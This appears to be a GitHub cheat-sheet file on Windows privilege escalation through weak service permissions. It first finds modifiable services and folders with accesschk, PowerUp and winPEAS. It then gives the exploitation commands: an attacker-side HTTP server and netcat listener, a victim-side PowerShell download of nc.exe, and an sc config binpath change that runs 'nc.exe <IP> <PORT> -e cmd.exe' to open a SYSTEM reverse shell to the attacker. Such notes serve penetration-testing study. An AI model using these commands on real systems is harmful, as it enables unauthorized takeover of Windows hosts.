-
Notifications
You must be signed in to change notification settings - Fork 7
/
weak_service_permission
51 lines (43 loc) · 1.49 KB
/
weak_service_permission
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
---
tags: [ exploit, wpe, windows, privesc ]
---
# Weak service permission
# Detection
# Find all services authenticated users have modify access onto
accesschk.exe /accepteula -uwcqv "Authenticated Users" *
#if SERVICE_ALL_ACCESS then vulnerable
# Find all weak folder permissions per drive.
accesschk.exe /accepteula -uwdqs Users c:\
accesschk.exe /accepteula -uwdqs "Authenticated Users" c:\
# Find all weak file permissions per drive.
accesschk.exe /accepteula -uwqs Users c:\*.*
accesschk.exe /accepteula -uwqs "Authenticated Users" c:\*.*
# or
powershell -exec bypass -command "& { Import-Module .\PowerUp.ps1; Invoke-AllChecks; }"
# [*] Checking service permissions...
#
# ServiceName : daclsvc
# Path : "C:\Program Files\DACL Service\daclservice.exe"
# StartName : LocalSystem
# AbuseFunction : Invoke-ServiceAbuse -Name 'daclsvc'
# CanRestart : True
# or
winPEAS.exe
# [+] Interesting Services -non Microsoft-(T1007)
#
# daclsvc(DACL Service)["C:\Program Files\DACL Service\daclservice.exe"] - Manual - Stopped
# YOU CAN MODIFY THIS SERVICE: WriteData/CreateFiles
#
# [+] Modifiable Services(T1007)
# LOOKS LIKE YOU CAN MODIFY SOME SERVICE/s:
# daclsvc: WriteData/CreateFiles
# Exploitation
# Attacker
sudo python -m SimpleHTTPServer 80
sudo nc -lvp <PORT>
# Victim
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://<IP>/nc.exe', '.\nc.exe')
sc config <SERVICENAME> binpath= "<PATH>\nc.exe <IP> <PORT> -e cmd.exe"
sc start <SERVICENAME>
# or
net start <SERVICENAME>